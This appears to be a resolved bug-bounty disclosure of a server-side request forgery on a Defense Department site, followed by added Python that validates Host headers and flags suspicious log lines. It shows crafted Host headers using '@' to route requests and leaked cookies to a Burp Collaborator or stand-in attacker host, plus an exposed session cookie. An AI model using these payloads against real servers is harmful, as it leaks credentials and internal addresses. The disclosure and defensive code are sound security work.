
SSRF vulnerability on ██████████ leaks internal IP and various sensitive information

Medium
U.S. Dept Of Defense
Submitted None
Reported by alyssa_herrera

Vulnerability Details

Technical details and impact analysis

Server-Side Request Forgery (SSRF)
**Summary:** A server-side request forgery vulnerability appears to leak an internal IP address and tries to connect to an attacker-controlled host.

**Description:** In a normal request to this web page

```
GET / HTTP/1.1
Host: www.████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG; googtrans=/en/zh-TW
Connection: close
Upgrade-Insecure-Requests: 1
```

it will connect to the website as expected, but if we use a `@` in the Host header like this

```
GET / HTTP/1.1
Host: www.█████████:80@██████████.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

it'll attempt to connect to our website and leak various information. On our server we would see this:

```
GET / HTTP/1.1
Host: ████████.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG
X--------------: 1.1.1.1
Accept-Encoding: gzip, deflate, identity
Connection: Keep-Alive
Authorization: Basic ████████
X-BlueCoat-Via: 913daace1d652c00
```

Additionally, we will see a DNS lookup from this IP, 214.72.0.2, which I confirmed to be DOD owned.

## Impact

Medium

## Step-by-step Reproduction Instructions

We can reproduce this simply using `www.████:[email protected]` for the Host header and we'll see the results, as seen below:

```
GET / HTTP/1.1
Host: www.████:[email protected]
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

If you have Burp Suite Pro, you can do this easily with Burp Collaborator.

## Product, Version, and Configuration (If applicable)

N/a

## Suggested Mitigation/Remediation Actions

Refuse attempts to connect to other hosts.
## Impact

This will allow attackers to gain access to an internal IP of a DOD website along with other sensitive information that may be leaked with the request.
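The root cause described in the report is a forwarding component that treats the Host header like a URL authority, so `www.example:80@other-host` is split into userinfo (`www.example:80`) and host (`other-host`) and the request is sent to the wrong place. The following Python is an added example, not code from the report, HackerOne or the affected site. It shows that parsing behaviour with `urllib.parse.urlsplit`, then implements the suggested mitigation (refuse to connect to other hosts) as a strict Host header parser plus an allowlist, and runs the same check over a few constructed log lines as a detection pass. The allowlist entry `www.example.mil` and the `host="..."` log format are assumptions for the example.

```python
"""Host header validation and detection for a forwarding proxy.

Added example (not from the original report). ALLOWED_HOSTS and the log
line format below are assumed for illustration.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Assumed allowlist: the only upstream hosts this proxy may forward to.
ALLOWED_HOSTS = {"www.example.mil"}

# Strict grammar: DNS labels, optional numeric port, nothing else.
_HOST_RE = re.compile(
    r"^(?P<host>[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*)"
    r"(?::(?P<port>\d{1,5}))?$",
    re.IGNORECASE,
)


def naive_upstream_host(host_header: str) -> Optional[str]:
    """What a URL-style parser makes of the header.

    Everything before '@' is treated as userinfo, so 'a:80@b' yields host 'b'.
    This is the behaviour the report exploits; shown here only to contrast
    with the strict parser below.
    """
    return urlsplit("http://" + host_header).hostname


def parse_host_header(value: str) -> Tuple[str, int]:
    """Parse a Host header into (host, port) or raise ValueError.

    Any userinfo or path delimiter is rejected outright rather than being
    interpreted, so 'a:80@b' never reaches the DNS or connect stage.
    """
    value = value.strip()
    if any(ch in value for ch in "@/\\?#") or any(ch.isspace() for ch in value):
        raise ValueError("Host header contains userinfo or path delimiters")
    match = _HOST_RE.fullmatch(value)
    if match is None:
        raise ValueError("malformed Host header")
    port = int(match.group("port") or 80)
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    return match.group("host").lower(), port


def upstream_target(host_header: str) -> Tuple[str, int]:
    """Resolve the upstream to connect to, enforcing the allowlist."""
    host, port = parse_host_header(host_header)
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"{host!r} is not an allowed upstream")
    return host, port


def is_rejected(host_header: str) -> bool:
    """True when the proxy would refuse to forward this Host header."""
    try:
        upstream_target(host_header)
    except ValueError:
        return True
    return False


# Constructed access-log lines for the detection pass (not real traffic).
SAMPLE_LOG: List[str] = [
    'client=203.0.113.5 host="www.example.mil" path="/"',
    'client=203.0.113.5 host="www.example.mil:80@collab.attacker.example" path="/"',
    'client=203.0.113.9 host="internal.corp.example" path="/"',
    'client=203.0.113.9 host="www.example.mil:8080" path="/"',
]
_LOG_HOST_RE = re.compile(r'host="([^"]*)"')


def flag_log_lines(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (line, reason) for every line whose Host value would be refused."""
    flagged = []
    for line in lines:
        match = _LOG_HOST_RE.search(line)
        if match is None:
            continue
        try:
            upstream_target(match.group(1))
        except ValueError as exc:
            flagged.append((line, str(exc)))
    return flagged


if __name__ == "__main__":
    print("naive parser sends", naive_upstream_host("www.example.mil:80@collab.attacker.example"))
    for line, reason in flag_log_lines(SAMPLE_LOG):
        print("FLAGGED:", reason, "<-", line)
```

The strict parser rejects delimiters before attempting any interpretation, which is the safer order: a component that first splits on `@` and only then validates has already decided which host it will contact. The allowlist is what implements "refuse attempts to connect to other hosts"; the log pass applies the same rule retrospectively so that requests carrying userinfo in the Host header stand out in existing access logs.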

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Server-Side Request Forgery (SSRF)